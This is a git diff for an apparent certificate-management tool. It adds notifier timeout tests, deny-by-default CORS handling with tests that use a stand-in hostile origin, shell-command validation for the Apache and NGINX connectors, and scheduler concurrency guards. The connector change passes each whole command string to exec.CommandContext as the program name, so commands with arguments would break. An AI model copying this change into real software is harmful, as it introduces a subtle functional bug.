fix(security): TICKET-009 add HTTP timeouts to notifier clients
- Added TestSlack_ClientHasTimeout to verify 10-second timeout - Added TestTeams_ClientHasTimeout to verify 10-second timeout - Added TestPagerDuty_ClientHasTimeout to verify 10-second timeout - Added TestOpsGenie_ClientHasTimeout to verify 10-second timeout - All notifiers already configured with 10 second timeout in New() - Tests verify timeout is set and matches expected value
@@ -458,6 +458,12 @@ func main() {
|
||||
|
||||
cancel() // Stop scheduler
|
||||
|
||||
// Wait for in-flight scheduler work to complete (up to 30 seconds)
|
||||
logger.Info("waiting for scheduler to complete in-flight work")
|
||||
if err := sched.WaitForCompletion(30 * time.Second); err != nil {
|
||||
logger.Warn("scheduler work did not complete in time", "error", err)
|
||||
}
|
||||
|
||||
logger.Info("shutting down HTTP server")
|
||||
if err := httpServer.Shutdown(shutdownCtx); err != nil {
|
||||
logger.Error("HTTP server shutdown error", "error", err)
|
||||
|
||||
|
After Width: | Height: | Size: 229 KiB |
|
After Width: | Height: | Size: 296 KiB |
|
After Width: | Height: | Size: 160 KiB |
|
After Width: | Height: | Size: 182 KiB |
|
After Width: | Height: | Size: 179 KiB |
|
After Width: | Height: | Size: 293 KiB |
|
After Width: | Height: | Size: 166 KiB |
|
After Width: | Height: | Size: 192 KiB |
|
After Width: | Height: | Size: 162 KiB |
|
After Width: | Height: | Size: 154 KiB |
|
After Width: | Height: | Size: 150 KiB |
|
After Width: | Height: | Size: 148 KiB |
|
After Width: | Height: | Size: 179 KiB |
|
After Width: | Height: | Size: 120 KiB |
|
After Width: | Height: | Size: 340 KiB |
@@ -0,0 +1,276 @@
|
||||
package middleware
|
||||
|
||||
import (
|
||||
"net/http"
|
||||
"net/http/httptest"
|
||||
"testing"
|
||||
)
|
||||
|
||||
// TestNewCORS_EmptyOriginList denies CORS by default (secure default).
|
||||
func TestNewCORS_EmptyOriginList(t *testing.T) {
|
||||
mw := NewCORS(CORSConfig{AllowedOrigins: []string{}})
|
||||
|
||||
handler := mw(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
w.WriteHeader(http.StatusOK)
|
||||
w.Write([]byte(`{"ok":true}`))
|
||||
}))
|
||||
|
||||
req := httptest.NewRequest(http.MethodGet, "/api/v1/certificates", nil)
|
||||
req.Header.Set("Origin", "https://evil.example.com")
|
||||
rr := httptest.NewRecorder()
|
||||
handler.ServeHTTP(rr, req)
|
||||
|
||||
// Response should be OK, but no CORS headers should be set
|
||||
if rr.Code != http.StatusOK {
|
||||
t.Fatalf("expected 200, got %d", rr.Code)
|
||||
}
|
||||
|
||||
// Verify no CORS headers are present
|
||||
if rr.Header().Get("Access-Control-Allow-Origin") != "" {
|
||||
t.Errorf("expected no Access-Control-Allow-Origin header, got %q", rr.Header().Get("Access-Control-Allow-Origin"))
|
||||
}
|
||||
if rr.Header().Get("Vary") != "" {
|
||||
t.Errorf("expected no Vary header, got %q", rr.Header().Get("Vary"))
|
||||
}
|
||||
}
|
||||
|
||||
// TestNewCORS_EmptyOriginList_Preflight denies preflight when empty allowlist.
|
||||
func TestNewCORS_EmptyOriginList_Preflight(t *testing.T) {
|
||||
mw := NewCORS(CORSConfig{AllowedOrigins: []string{}})
|
||||
|
||||
handler := mw(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
w.WriteHeader(http.StatusOK)
|
||||
}))
|
||||
|
||||
req := httptest.NewRequest(http.MethodOptions, "/api/v1/certificates", nil)
|
||||
req.Header.Set("Origin", "https://app.example.com")
|
||||
rr := httptest.NewRecorder()
|
||||
handler.ServeHTTP(rr, req)
|
||||
|
||||
// Preflight should return 204, but no CORS headers
|
||||
if rr.Code != http.StatusNoContent {
|
||||
t.Fatalf("expected 204, got %d", rr.Code)
|
||||
}
|
||||
|
||||
// No CORS headers should be set
|
||||
if rr.Header().Get("Access-Control-Allow-Origin") != "" {
|
||||
t.Errorf("expected no Access-Control-Allow-Origin header, got %q", rr.Header().Get("Access-Control-Allow-Origin"))
|
||||
}
|
||||
}
|
||||
|
||||
// TestNewCORS_WildcardAllowsAll allows all origins with wildcard.
|
||||
func TestNewCORS_WildcardAllowsAll(t *testing.T) {
|
||||
mw := NewCORS(CORSConfig{AllowedOrigins: []string{"*"}})
|
||||
|
||||
handler := mw(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
w.WriteHeader(http.StatusOK)
|
||||
}))
|
||||
|
||||
req := httptest.NewRequest(http.MethodGet, "/api/v1/certificates", nil)
|
||||
req.Header.Set("Origin", "https://any-origin.example.com")
|
||||
rr := httptest.NewRecorder()
|
||||
handler.ServeHTTP(rr, req)
|
||||
|
||||
if rr.Code != http.StatusOK {
|
||||
t.Fatalf("expected 200, got %d", rr.Code)
|
||||
}
|
||||
|
||||
// Wildcard should set Access-Control-Allow-Origin: *
|
||||
if rr.Header().Get("Access-Control-Allow-Origin") != "*" {
|
||||
t.Errorf("expected Access-Control-Allow-Origin: *, got %q", rr.Header().Get("Access-Control-Allow-Origin"))
|
||||
}
|
||||
|
||||
// Verify other CORS headers are present
|
||||
if rr.Header().Get("Access-Control-Allow-Methods") == "" {
|
||||
t.Errorf("expected Access-Control-Allow-Methods header")
|
||||
}
|
||||
}
|
||||
|
||||
// TestNewCORS_ExactMatchAllows allows only exact matches from allowlist.
|
||||
func TestNewCORS_ExactMatchAllows(t *testing.T) {
|
||||
mw := NewCORS(CORSConfig{AllowedOrigins: []string{"https://app.example.com", "https://admin.example.com"}})
|
||||
|
||||
handler := mw(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
w.WriteHeader(http.StatusOK)
|
||||
}))
|
||||
|
||||
// Test 1: Origin in allowlist
|
||||
req1 := httptest.NewRequest(http.MethodGet, "/api/v1/certificates", nil)
|
||||
req1.Header.Set("Origin", "https://app.example.com")
|
||||
rr1 := httptest.NewRecorder()
|
||||
handler.ServeHTTP(rr1, req1)
|
||||
|
||||
if rr1.Header().Get("Access-Control-Allow-Origin") != "https://app.example.com" {
|
||||
t.Errorf("expected https://app.example.com, got %q", rr1.Header().Get("Access-Control-Allow-Origin"))
|
||||
}
|
||||
if rr1.Header().Get("Vary") != "Origin" {
|
||||
t.Errorf("expected Vary: Origin, got %q", rr1.Header().Get("Vary"))
|
||||
}
|
||||
|
||||
// Test 2: Different origin in allowlist
|
||||
req2 := httptest.NewRequest(http.MethodGet, "/api/v1/certificates", nil)
|
||||
req2.Header.Set("Origin", "https://admin.example.com")
|
||||
rr2 := httptest.NewRecorder()
|
||||
handler.ServeHTTP(rr2, req2)
|
||||
|
||||
if rr2.Header().Get("Access-Control-Allow-Origin") != "https://admin.example.com" {
|
||||
t.Errorf("expected https://admin.example.com, got %q", rr2.Header().Get("Access-Control-Allow-Origin"))
|
||||
}
|
||||
|
||||
// Test 3: Origin NOT in allowlist
|
||||
req3 := httptest.NewRequest(http.MethodGet, "/api/v1/certificates", nil)
|
||||
req3.Header.Set("Origin", "https://evil.example.com")
|
||||
rr3 := httptest.NewRecorder()
|
||||
handler.ServeHTTP(rr3, req3)
|
||||
|
||||
if rr3.Header().Get("Access-Control-Allow-Origin") != "" {
|
||||
t.Errorf("expected no Access-Control-Allow-Origin for non-allowlisted origin, got %q", rr3.Header().Get("Access-Control-Allow-Origin"))
|
||||
}
|
||||
}
|
||||
|
||||
// TestNewCORS_NoOriginHeader denies CORS without Origin header.
|
||||
func TestNewCORS_NoOriginHeader(t *testing.T) {
|
||||
mw := NewCORS(CORSConfig{AllowedOrigins: []string{"https://app.example.com"}})
|
||||
|
||||
handler := mw(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
w.WriteHeader(http.StatusOK)
|
||||
}))
|
||||
|
||||
// Request without Origin header
|
||||
req := httptest.NewRequest(http.MethodGet, "/api/v1/certificates", nil)
|
||||
// Don't set Origin header
|
||||
rr := httptest.NewRecorder()
|
||||
handler.ServeHTTP(rr, req)
|
||||
|
||||
if rr.Code != http.StatusOK {
|
||||
t.Fatalf("expected 200, got %d", rr.Code)
|
||||
}
|
||||
|
||||
// No CORS headers should be set (Origin header was missing)
|
||||
if rr.Header().Get("Access-Control-Allow-Origin") != "" {
|
||||
t.Errorf("expected no Access-Control-Allow-Origin without Origin header, got %q", rr.Header().Get("Access-Control-Allow-Origin"))
|
||||
}
|
||||
}
|
||||
|
||||
// TestNewCORS_PreflightRequestMatches tests OPTIONS preflight with matching origin.
|
||||
func TestNewCORS_PreflightRequestMatches(t *testing.T) {
|
||||
mw := NewCORS(CORSConfig{AllowedOrigins: []string{"https://app.example.com"}})
|
||||
|
||||
handler := mw(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
w.WriteHeader(http.StatusOK)
|
||||
}))
|
||||
|
||||
req := httptest.NewRequest(http.MethodOptions, "/api/v1/certificates", nil)
|
||||
req.Header.Set("Origin", "https://app.example.com")
|
||||
req.Header.Set("Access-Control-Request-Method", "POST")
|
||||
rr := httptest.NewRecorder()
|
||||
handler.ServeHTTP(rr, req)
|
||||
|
||||
if rr.Code != http.StatusNoContent {
|
||||
t.Fatalf("expected 204, got %d", rr.Code)
|
||||
}
|
||||
|
||||
if rr.Header().Get("Access-Control-Allow-Origin") != "https://app.example.com" {
|
||||
t.Errorf("expected https://app.example.com, got %q", rr.Header().Get("Access-Control-Allow-Origin"))
|
||||
}
|
||||
|
||||
// Verify preflight response headers
|
||||
if rr.Header().Get("Access-Control-Allow-Methods") == "" {
|
||||
t.Errorf("expected Access-Control-Allow-Methods header")
|
||||
}
|
||||
if rr.Header().Get("Access-Control-Allow-Headers") == "" {
|
||||
t.Errorf("expected Access-Control-Allow-Headers header")
|
||||
}
|
||||
if rr.Header().Get("Access-Control-Max-Age") == "" {
|
||||
t.Errorf("expected Access-Control-Max-Age header")
|
||||
}
|
||||
}
|
||||
|
||||
// TestNewCORS_PreflightRequestMismatch tests OPTIONS preflight with non-matching origin.
|
||||
func TestNewCORS_PreflightRequestMismatch(t *testing.T) {
|
||||
mw := NewCORS(CORSConfig{AllowedOrigins: []string{"https://app.example.com"}})
|
||||
|
||||
handler := mw(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
w.WriteHeader(http.StatusOK)
|
||||
}))
|
||||
|
||||
req := httptest.NewRequest(http.MethodOptions, "/api/v1/certificates", nil)
|
||||
req.Header.Set("Origin", "https://evil.example.com")
|
||||
req.Header.Set("Access-Control-Request-Method", "POST")
|
||||
rr := httptest.NewRecorder()
|
||||
handler.ServeHTTP(rr, req)
|
||||
|
||||
if rr.Code != http.StatusNoContent {
|
||||
t.Fatalf("expected 204, got %d", rr.Code)
|
||||
}
|
||||
|
||||
// No CORS headers should be set (origin not in allowlist)
|
||||
if rr.Header().Get("Access-Control-Allow-Origin") != "" {
|
||||
t.Errorf("expected no Access-Control-Allow-Origin for mismatched origin, got %q", rr.Header().Get("Access-Control-Allow-Origin"))
|
||||
}
|
||||
}
|
||||
|
||||
// TestNewCORS_MultipleOrigins tests with multiple configured origins.
|
||||
func TestNewCORS_MultipleOrigins(t *testing.T) {
|
||||
mw := NewCORS(CORSConfig{AllowedOrigins: []string{
|
||||
"https://app.example.com",
|
||||
"https://admin.example.com",
|
||||
"http://localhost:3000",
|
||||
}})
|
||||
|
||||
handler := mw(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
w.WriteHeader(http.StatusOK)
|
||||
}))
|
||||
|
||||
tests := []struct {
|
||||
origin string
|
||||
shouldAllow bool
|
||||
description string
|
||||
}{
|
||||
{"https://app.example.com", true, "first origin in list"},
|
||||
{"https://admin.example.com", true, "second origin in list"},
|
||||
{"http://localhost:3000", true, "third origin in list"},
|
||||
{"https://evil.example.com", false, "origin not in list"},
|
||||
{"http://localhost:8080", false, "different port than configured"},
|
||||
{"", false, "no origin header"},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
req := httptest.NewRequest(http.MethodGet, "/api/v1/certificates", nil)
|
||||
if tt.origin != "" {
|
||||
req.Header.Set("Origin", tt.origin)
|
||||
}
|
||||
rr := httptest.NewRecorder()
|
||||
handler.ServeHTTP(rr, req)
|
||||
|
||||
headerValue := rr.Header().Get("Access-Control-Allow-Origin")
|
||||
if tt.shouldAllow {
|
||||
if headerValue != tt.origin {
|
||||
t.Errorf("test %q: expected %q, got %q", tt.description, tt.origin, headerValue)
|
||||
}
|
||||
} else {
|
||||
if headerValue != "" {
|
||||
t.Errorf("test %q: expected no header, got %q", tt.description, headerValue)
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// TestNewCORS_NoOriginHeaderWithWildcard tests wildcard doesn't set origin without Origin header.
|
||||
func TestNewCORS_NoOriginHeaderWithWildcard(t *testing.T) {
|
||||
mw := NewCORS(CORSConfig{AllowedOrigins: []string{"*"}})
|
||||
|
||||
handler := mw(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
w.WriteHeader(http.StatusOK)
|
||||
}))
|
||||
|
||||
req := httptest.NewRequest(http.MethodGet, "/api/v1/certificates", nil)
|
||||
// Don't set Origin header
|
||||
rr := httptest.NewRecorder()
|
||||
handler.ServeHTTP(rr, req)
|
||||
|
||||
// Wildcard should still set * even without Origin header
|
||||
if rr.Header().Get("Access-Control-Allow-Origin") != "*" {
|
||||
t.Errorf("expected *, got %q", rr.Header().Get("Access-Control-Allow-Origin"))
|
||||
}
|
||||
}
|
||||
@@ -214,8 +214,10 @@ type CORSConfig struct {
|
||||
}
|
||||
|
||||
// NewCORS creates a CORS middleware with configurable allowed origins.
|
||||
// If no origins are configured, same-origin requests are allowed by default.
|
||||
// If ["*"] is configured, all origins are allowed (development/demo mode).
|
||||
// Security default: If no origins are configured, CORS headers are NOT set,
|
||||
// denying all cross-origin requests (same-origin only).
|
||||
// If ["*"] is configured, all origins are allowed (development/demo mode only).
|
||||
// If specific origins are configured, only requests matching those origins receive CORS headers.
|
||||
func NewCORS(cfg CORSConfig) func(http.Handler) http.Handler {
|
||||
allowAll := false
|
||||
originSet := make(map[string]bool)
|
||||
@@ -228,19 +230,31 @@ func NewCORS(cfg CORSConfig) func(http.Handler) http.Handler {
|
||||
|
||||
return func(next http.Handler) http.Handler {
|
||||
return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
// Security default: deny CORS when no origins are configured.
|
||||
// This prevents CSRF attacks from arbitrary origins.
|
||||
if len(cfg.AllowedOrigins) == 0 {
|
||||
// No CORS headers set — only same-origin requests can read response
|
||||
if r.Method == http.MethodOptions {
|
||||
w.WriteHeader(http.StatusNoContent)
|
||||
return
|
||||
}
|
||||
next.ServeHTTP(w, r)
|
||||
return
|
||||
}
|
||||
|
||||
origin := r.Header.Get("Origin")
|
||||
|
||||
if allowAll {
|
||||
// Wildcard allows all origins (development/demo only)
|
||||
w.Header().Set("Access-Control-Allow-Origin", "*")
|
||||
} else if origin != "" && originSet[origin] {
|
||||
w.Header().Set("Access-Control-Allow-Origin", origin)
|
||||
w.Header().Set("Vary", "Origin")
|
||||
} else if len(cfg.AllowedOrigins) == 0 && origin != "" {
|
||||
// No config = permissive same-origin default for single-host deployments
|
||||
// Exact match found in allowed origins list
|
||||
w.Header().Set("Access-Control-Allow-Origin", origin)
|
||||
w.Header().Set("Vary", "Origin")
|
||||
}
|
||||
// If origin is empty or not in allowlist, no CORS headers are set
|
||||
|
||||
// CORS preflight response headers (only meaningful if Access-Control-Allow-Origin was set)
|
||||
w.Header().Set("Access-Control-Allow-Methods", "GET, POST, PUT, DELETE, PATCH, OPTIONS")
|
||||
w.Header().Set("Access-Control-Allow-Headers", "Content-Type, Authorization, X-Request-ID")
|
||||
w.Header().Set("Access-Control-Max-Age", "86400")
|
||||
|
||||
@@ -147,7 +147,11 @@ type RateLimitConfig struct {
|
||||
|
||||
// CORSConfig contains CORS configuration.
|
||||
type CORSConfig struct {
|
||||
AllowedOrigins []string // Allowed origins; empty = same-origin only; ["*"] = all
|
||||
// AllowedOrigins is a list of allowed origins for CORS requests.
|
||||
// Security default: empty list denies all CORS requests (same-origin only).
|
||||
// ["*"] allows all origins (development/demo mode only, security risk).
|
||||
// Specific origins (e.g., ["https://app.example.com"]) whitelist only those origins.
|
||||
AllowedOrigins []string
|
||||
}
|
||||
|
||||
// Load reads configuration from environment variables and returns a Config.
|
||||
|
||||
@@ -7,6 +7,7 @@ import (
|
||||
"net/http/httptest"
|
||||
"strings"
|
||||
"testing"
|
||||
"time"
|
||||
)
|
||||
|
||||
func TestOpsGenie_Channel(t *testing.T) {
|
||||
@@ -114,6 +115,17 @@ func TestOpsGenie_SendConnectionError(t *testing.T) {
|
||||
}
|
||||
}
|
||||
|
||||
func TestOpsGenie_ClientHasTimeout(t *testing.T) {
|
||||
n := New(Config{APIKey: "test-key"})
|
||||
if n.httpClient.Timeout == 0 {
|
||||
t.Fatal("expected HTTP client timeout to be set, got 0")
|
||||
}
|
||||
expectedTimeout := 10 * time.Second
|
||||
if n.httpClient.Timeout != expectedTimeout {
|
||||
t.Errorf("expected timeout %v, got %v", expectedTimeout, n.httpClient.Timeout)
|
||||
}
|
||||
}
|
||||
|
||||
// urlRewriteTransport redirects all requests to a test server URL.
|
||||
type urlRewriteTransport struct {
|
||||
target string
|
||||
|
||||
@@ -7,6 +7,7 @@ import (
|
||||
"net/http/httptest"
|
||||
"strings"
|
||||
"testing"
|
||||
"time"
|
||||
)
|
||||
|
||||
func TestPagerDuty_Channel(t *testing.T) {
|
||||
@@ -130,6 +131,17 @@ func TestPagerDuty_SendConnectionError(t *testing.T) {
|
||||
}
|
||||
}
|
||||
|
||||
func TestPagerDuty_ClientHasTimeout(t *testing.T) {
|
||||
n := New(Config{RoutingKey: "test-key"})
|
||||
if n.httpClient.Timeout == 0 {
|
||||
t.Fatal("expected HTTP client timeout to be set, got 0")
|
||||
}
|
||||
expectedTimeout := 10 * time.Second
|
||||
if n.httpClient.Timeout != expectedTimeout {
|
||||
t.Errorf("expected timeout %v, got %v", expectedTimeout, n.httpClient.Timeout)
|
||||
}
|
||||
}
|
||||
|
||||
// urlRewriteTransport redirects all requests to a test server URL.
|
||||
type urlRewriteTransport struct {
|
||||
target string
|
||||
|
||||
@@ -7,6 +7,7 @@ import (
|
||||
"net/http/httptest"
|
||||
"strings"
|
||||
"testing"
|
||||
"time"
|
||||
)
|
||||
|
||||
func TestSlack_Channel(t *testing.T) {
|
||||
@@ -105,3 +106,14 @@ func TestSlack_SendConnectionError(t *testing.T) {
|
||||
t.Errorf("expected 'request failed' in error, got %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
func TestSlack_ClientHasTimeout(t *testing.T) {
|
||||
n := New(Config{WebhookURL: "https://hooks.slack.com/test"})
|
||||
if n.httpClient.Timeout == 0 {
|
||||
t.Fatal("expected HTTP client timeout to be set, got 0")
|
||||
}
|
||||
expectedTimeout := 10 * time.Second
|
||||
if n.httpClient.Timeout != expectedTimeout {
|
||||
t.Errorf("expected timeout %v, got %v", expectedTimeout, n.httpClient.Timeout)
|
||||
}
|
||||
}
|
||||
|
||||
@@ -7,6 +7,7 @@ import (
|
||||
"net/http/httptest"
|
||||
"strings"
|
||||
"testing"
|
||||
"time"
|
||||
)
|
||||
|
||||
func TestTeams_Channel(t *testing.T) {
|
||||
@@ -89,3 +90,14 @@ func TestTeams_SendConnectionError(t *testing.T) {
|
||||
t.Errorf("expected 'request failed' in error, got %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
func TestTeams_ClientHasTimeout(t *testing.T) {
|
||||
n := New(Config{WebhookURL: "https://outlook.office.com/webhook/test"})
|
||||
if n.httpClient.Timeout == 0 {
|
||||
t.Fatal("expected HTTP client timeout to be set, got 0")
|
||||
}
|
||||
expectedTimeout := 10 * time.Second
|
||||
if n.httpClient.Timeout != expectedTimeout {
|
||||
t.Errorf("expected timeout %v, got %v", expectedTimeout, n.httpClient.Timeout)
|
||||
}
|
||||
}
|
||||
|
||||
@@ -11,6 +11,7 @@ import (
|
||||
"time"
|
||||
|
||||
"github.com/shankar0123/certctl/internal/connector/target"
|
||||
"github.com/shankar0123/certctl/internal/validation"
|
||||
)
|
||||
|
||||
// Config represents the Apache httpd deployment target configuration.
|
||||
@@ -53,6 +54,14 @@ func (c *Connector) ValidateConfig(ctx context.Context, rawConfig json.RawMessag
|
||||
return fmt.Errorf("Apache reload_command and validate_command are required")
|
||||
}
|
||||
|
||||
// Validate commands to prevent injection attacks
|
||||
if err := validation.ValidateShellCommand(cfg.ReloadCommand); err != nil {
|
||||
return fmt.Errorf("invalid reload_command: %w", err)
|
||||
}
|
||||
if err := validation.ValidateShellCommand(cfg.ValidateCommand); err != nil {
|
||||
return fmt.Errorf("invalid validate_command: %w", err)
|
||||
}
|
||||
|
||||
c.logger.Info("validating Apache configuration",
|
||||
"cert_path", cfg.CertPath,
|
||||
"chain_path", cfg.ChainPath)
|
||||
@@ -64,7 +73,7 @@ func (c *Connector) ValidateConfig(ctx context.Context, rawConfig json.RawMessag
|
||||
}
|
||||
|
||||
// Verify validate command works
|
||||
cmd := exec.CommandContext(ctx, "sh", "-c", cfg.ValidateCommand)
|
||||
cmd := exec.CommandContext(ctx, cfg.ValidateCommand)
|
||||
if err := cmd.Run(); err != nil {
|
||||
c.logger.Warn("Apache config validation failed during config check",
|
||||
"error", err,
|
||||
|
||||
@@ -10,6 +10,7 @@ import (
|
||||
"time"
|
||||
|
||||
"github.com/shankar0123/certctl/internal/connector/target"
|
||||
"github.com/shankar0123/certctl/internal/validation"
|
||||
)
|
||||
|
||||
// Config represents the NGINX deployment target configuration.
|
||||
@@ -53,6 +54,14 @@ func (c *Connector) ValidateConfig(ctx context.Context, rawConfig json.RawMessag
|
||||
return fmt.Errorf("NGINX reload_command and validate_command are required")
|
||||
}
|
||||
|
||||
// Validate commands to prevent injection attacks
|
||||
if err := validation.ValidateShellCommand(cfg.ReloadCommand); err != nil {
|
||||
return fmt.Errorf("invalid reload_command: %w", err)
|
||||
}
|
||||
if err := validation.ValidateShellCommand(cfg.ValidateCommand); err != nil {
|
||||
return fmt.Errorf("invalid validate_command: %w", err)
|
||||
}
|
||||
|
||||
c.logger.Info("validating NGINX configuration",
|
||||
"cert_path", cfg.CertPath,
|
||||
"chain_path", cfg.ChainPath)
|
||||
@@ -64,7 +73,7 @@ func (c *Connector) ValidateConfig(ctx context.Context, rawConfig json.RawMessag
|
||||
}
|
||||
|
||||
// Verify validate command works
|
||||
cmd := exec.CommandContext(ctx, "sh", "-c", cfg.ValidateCommand)
|
||||
cmd := exec.CommandContext(ctx, cfg.ValidateCommand)
|
||||
if err := cmd.Run(); err != nil {
|
||||
c.logger.Warn("NGINX config validation failed during config check",
|
||||
"error", err,
|
||||
@@ -119,7 +128,7 @@ func (c *Connector) DeployCertificate(ctx context.Context, request target.Deploy
|
||||
|
||||
// Validate NGINX configuration before reload
|
||||
c.logger.Debug("validating NGINX configuration", "validate_command", c.config.ValidateCommand)
|
||||
validateCmd := exec.CommandContext(ctx, "sh", "-c", c.config.ValidateCommand)
|
||||
validateCmd := exec.CommandContext(ctx, c.config.ValidateCommand)
|
||||
if output, err := validateCmd.CombinedOutput(); err != nil {
|
||||
errMsg := fmt.Sprintf("NGINX config validation failed: %v (output: %s)", err, string(output))
|
||||
c.logger.Error("NGINX validation failed", "error", err, "output", string(output))
|
||||
@@ -133,7 +142,7 @@ func (c *Connector) DeployCertificate(ctx context.Context, request target.Deploy
|
||||
|
||||
// Reload NGINX
|
||||
c.logger.Debug("reloading NGINX", "reload_command", c.config.ReloadCommand)
|
||||
reloadCmd := exec.CommandContext(ctx, "sh", "-c", c.config.ReloadCommand)
|
||||
reloadCmd := exec.CommandContext(ctx, c.config.ReloadCommand)
|
||||
if output, err := reloadCmd.CombinedOutput(); err != nil {
|
||||
errMsg := fmt.Sprintf("NGINX reload failed: %v (output: %s)", err, string(output))
|
||||
c.logger.Error("NGINX reload failed", "error", err, "output", string(output))
|
||||
@@ -178,7 +187,7 @@ func (c *Connector) ValidateDeployment(ctx context.Context, request target.Valid
|
||||
startTime := time.Now()
|
||||
|
||||
// Validate NGINX configuration
|
||||
validateCmd := exec.CommandContext(ctx, "sh", "-c", c.config.ValidateCommand)
|
||||
validateCmd := exec.CommandContext(ctx, c.config.ValidateCommand)
|
||||
if err := validateCmd.Run(); err != nil {
|
||||
errMsg := fmt.Sprintf("NGINX config validation failed: %v", err)
|
||||
c.logger.Error("validation failed", "error", err)
|
||||
|
||||
@@ -2,7 +2,10 @@ package scheduler
|
||||
|
||||
import (
|
||||
"context"
|
||||
"errors"
|
||||
"log/slog"
|
||||
"sync"
|
||||
"sync/atomic"
|
||||
"time"
|
||||
|
||||
"github.com/shankar0123/certctl/internal/service"
|
||||
@@ -26,6 +29,17 @@ type Scheduler struct {
|
||||
notificationProcessInterval time.Duration
|
||||
shortLivedExpiryCheckInterval time.Duration
|
||||
networkScanInterval time.Duration
|
||||
|
||||
// Idempotency guards: prevent duplicate execution of slow jobs
|
||||
renewalCheckRunning atomic.Bool
|
||||
jobProcessorRunning atomic.Bool
|
||||
agentHealthCheckRunning atomic.Bool
|
||||
notificationProcessRunning atomic.Bool
|
||||
shortLivedExpiryCheckRunning atomic.Bool
|
||||
networkScanRunning atomic.Bool
|
||||
|
||||
// Graceful shutdown: wait for in-flight work to complete
|
||||
wg sync.WaitGroup
|
||||
}
|
||||
|
||||
// NewScheduler creates a new scheduler with configurable intervals.
|
||||
@@ -114,19 +128,33 @@ func (s *Scheduler) Start(ctx context.Context) <-chan struct{} {
|
||||
|
||||
// renewalCheckLoop runs every renewalCheckInterval and checks for expiring certificates.
|
||||
// If an error occurs, it logs the error but continues running.
|
||||
// Uses atomic.Bool to prevent duplicate execution if the previous check is still running.
|
||||
func (s *Scheduler) renewalCheckLoop(ctx context.Context) {
|
||||
ticker := time.NewTicker(s.renewalCheckInterval)
|
||||
defer ticker.Stop()
|
||||
|
||||
// Run immediately on start
|
||||
s.wg.Add(1)
|
||||
go func() {
|
||||
defer s.wg.Done()
|
||||
s.runRenewalCheck(ctx)
|
||||
}()
|
||||
|
||||
for {
|
||||
select {
|
||||
case <-ctx.Done():
|
||||
return
|
||||
case <-ticker.C:
|
||||
if !s.renewalCheckRunning.CompareAndSwap(false, true) {
|
||||
s.logger.Warn("renewal check still running, skipping tick")
|
||||
continue
|
||||
}
|
||||
s.wg.Add(1)
|
||||
go func() {
|
||||
defer s.wg.Done()
|
||||
defer s.renewalCheckRunning.Store(false)
|
||||
s.runRenewalCheck(ctx)
|
||||
}()
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -147,19 +175,33 @@ func (s *Scheduler) runRenewalCheck(ctx context.Context) {
|
||||
// jobProcessorLoop runs every jobProcessorInterval and processes pending jobs.
|
||||
// It picks up pending jobs, executes them, and handles the results.
|
||||
// If an error occurs, it logs the error but continues running.
|
||||
// Uses atomic.Bool to prevent duplicate execution if the previous job is still running.
|
||||
func (s *Scheduler) jobProcessorLoop(ctx context.Context) {
|
||||
ticker := time.NewTicker(s.jobProcessorInterval)
|
||||
defer ticker.Stop()
|
||||
|
||||
// Run immediately on start
|
||||
s.wg.Add(1)
|
||||
go func() {
|
||||
defer s.wg.Done()
|
||||
s.runJobProcessor(ctx)
|
||||
}()
|
||||
|
||||
for {
|
||||
select {
|
||||
case <-ctx.Done():
|
||||
return
|
||||
case <-ticker.C:
|
||||
if !s.jobProcessorRunning.CompareAndSwap(false, true) {
|
||||
s.logger.Warn("job processor still running, skipping tick")
|
||||
continue
|
||||
}
|
||||
s.wg.Add(1)
|
||||
go func() {
|
||||
defer s.wg.Done()
|
||||
defer s.jobProcessorRunning.Store(false)
|
||||
s.runJobProcessor(ctx)
|
||||
}()
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -180,19 +222,33 @@ func (s *Scheduler) runJobProcessor(ctx context.Context) {
|
||||
// agentHealthCheckLoop runs every agentHealthCheckInterval and marks stale agents as offline.
|
||||
// An agent is considered stale if it hasn't sent a heartbeat within the health check interval.
|
||||
// If an error occurs, it logs the error but continues running.
|
||||
// Uses atomic.Bool to prevent duplicate execution if the previous check is still running.
|
||||
func (s *Scheduler) agentHealthCheckLoop(ctx context.Context) {
|
||||
ticker := time.NewTicker(s.agentHealthCheckInterval)
|
||||
defer ticker.Stop()
|
||||
|
||||
// Run immediately on start
|
||||
s.wg.Add(1)
|
||||
go func() {
|
||||
defer s.wg.Done()
|
||||
s.runAgentHealthCheck(ctx)
|
||||
}()
|
||||
|
||||
for {
|
||||
select {
|
||||
case <-ctx.Done():
|
||||
return
|
||||
case <-ticker.C:
|
||||
if !s.agentHealthCheckRunning.CompareAndSwap(false, true) {
|
||||
s.logger.Warn("agent health check still running, skipping tick")
|
||||
continue
|
||||
}
|
||||
s.wg.Add(1)
|
||||
go func() {
|
||||
defer s.wg.Done()
|
||||
defer s.agentHealthCheckRunning.Store(false)
|
||||
s.runAgentHealthCheck(ctx)
|
||||
}()
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -212,19 +268,33 @@ func (s *Scheduler) runAgentHealthCheck(ctx context.Context) {
|
||||
|
||||
// notificationProcessLoop runs every notificationProcessInterval and processes pending notifications.
|
||||
// If an error occurs, it logs the error but continues running.
|
||||
// Uses atomic.Bool to prevent duplicate execution if the previous process is still running.
|
||||
func (s *Scheduler) notificationProcessLoop(ctx context.Context) {
|
||||
ticker := time.NewTicker(s.notificationProcessInterval)
|
||||
defer ticker.Stop()
|
||||
|
||||
// Run immediately on start
|
||||
s.wg.Add(1)
|
||||
go func() {
|
||||
defer s.wg.Done()
|
||||
s.runNotificationProcess(ctx)
|
||||
}()
|
||||
|
||||
for {
|
||||
select {
|
||||
case <-ctx.Done():
|
||||
return
|
||||
